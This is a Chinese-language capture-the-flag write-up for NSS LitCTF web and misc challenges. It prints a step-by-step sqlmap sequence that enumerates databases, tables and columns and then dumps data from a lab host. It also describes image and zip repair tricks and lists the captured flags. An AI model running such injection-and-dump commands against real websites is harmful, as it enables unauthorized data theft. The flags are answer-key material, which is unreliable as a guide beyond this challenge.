当前位置: 首页 > news >正文

NSS LitCTF部分wp

web

1、PHP是世界上最好的语言!!

直接cat flag

 flag=NSSCTF{11eaebe0-3764-410d-be83-b23532a24235}

2、这是什么?SQL !注一下 !

 直接查询,发现注入点是id

 

 使用sqlmap列出所以数据库

​sqlmap -u "http://node1.anna.nssctf.cn:28755//?id=1" --dbs 

 available databases [6]:
[*] ctf
[*] ctftraining
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

列出指定数据库的表

第一个里面没什么发现,在第二个库里面看到flag字样

​sqlmap -u "http://node1.anna.nssctf.cn:28755/?id=1" -D ctftraining --tables 

继续列出指定表的字段

​sqlmap -u "http://node1.anna.nssctf.cn:28755/?id=1"  -D ctftraining -T flag --columns 

获取指定字段中的数据

​sqlmap -u "http://node1.anna.nssctf.cn:28755/?id=1"  -D ctftraining -T flag -C flag --dump

 NSSCTF{759de34b-d02a-4781-a33c-113aba994a10}

 Misc

1、Take me hand

使用010editor打开搜寻关键字flag 

放入随波逐流解码

 NSSCTF{Give_y0ur_hand_to_me!!!_plz}

2、喜欢我的压缩包么

打开附件发现加密了

尝试恢复密码

 打开即可看到

NSSCTF{Do-u-like-my-zip-p4ck?} 

3、破损的图片

使用010editor打开发现文件头缺失,根据题目提示是破损的图片,且没有出现高亮,应该是png

 直接补上pn头,另存为后打开

 

 NSSCTF{May you, the beauty of this world, always shine.}

4、这羽毛球怎么只有一半啊

打开附件,很明显感觉图片高度不够

 将高度改高

另存为 打开看到flag

 NSSCTF{Fl4g_0fcourse!}

其他的后面会继续更新!

http://www.lryc.cn/news/69139.html

相关文章:

  • 【开发者指南】如何在MyEclipse中编辑HTML或JSP文件?(一)
  • 关于博客停更的原因
  • 智能感知编码优化与落地实践
  • OpenCL编程指南-5.1工作项函数-整数函数-公共函数
  • 教你接入Midjourney,不用梯子也能玩
  • Mysql中常用到的查询关键字
  • 【ROS】ROS1工具详解
  • 论Plant Simulation中的Init的使用及调用顺序
  • nginx实现正向代理
  • 【spark】
  • ADO.NET 面试题
  • 第三篇、基于Arduino uno,用oled0.96寸屏幕显示dht11温湿度传感器的温度和湿度信息——结果导向
  • 什么是npu算力盒子,算力是越大越好吗?
  • 后端返回文件流时,前端如何处理并成功下载流文件以及解决下载后打开显示不支持此文件格式
  • Ansible的脚本-playbook 剧本
  • python lambda表达式表达式详解及应用
  • Windows 10计算机性能优化:让你的电脑更流畅
  • SpringMVC底层原理源码解析
  • 【CSS系列】第八章 · CSS浮动
  • janus videoroom 对接freeswitch conference 篇1
  • cs109-energy+哈佛大学能源探索项目 Part-2.1(Data Wrangling)
  • __101对称二叉树------进阶:你可以运用递归和迭代两种方法解决这个问题吗?---本题还没用【迭代】去实现
  • 怎么取消只读模式?硬盘进入只读模式怎么办?
  • 如何使用Java生成Web项目验证码
  • 【读书笔记】《亲密关系》
  • 面试季,真的太狠了...
  • 2023年十大最佳黑客工具!
  • 每日练习---C语言
  • 边缘计算如何推动物联网的发展
  • 第五章 栈与队列